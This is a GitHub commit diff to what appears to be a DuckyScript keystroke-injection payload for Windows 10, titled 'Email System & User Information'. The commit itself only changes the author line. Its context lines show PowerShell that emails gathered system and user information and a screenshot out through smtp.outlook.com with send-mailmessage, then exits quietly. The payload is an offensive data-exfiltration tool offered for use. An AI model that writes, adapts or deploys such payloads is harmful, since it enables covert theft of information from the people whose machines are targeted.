Update Email System Info with Screenshot.txt

This commit is contained in:
beigeworm
2023-05-10 12:56:34 +00:00
committed by GitHub
parent 92f67c5f46
commit 6cb86a1785

View File

@@ -1,5 +1,5 @@
REM Title: Email System & User Information
REM Author: @beigeworm
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses Powershell to gather user and system information and send to an Email.
REM Target: Windows 10
@@ -58,4 +58,4 @@ STRING ;$smtp = "smtp.outlook.com";$prt = "587";$cdtl = new-object Management.Au
STRING ;$time = Get-Date;$ct = $time.addminutes($lost)
STRING ;send-mailmessage -from $email -to $email -subject $subj -body $body -Attachment $syslog,$scfile -smtpServer $smtp -port $prt -credential $cdtl -usessl
STRING ;sleep 10;exit
ENTER
ENTER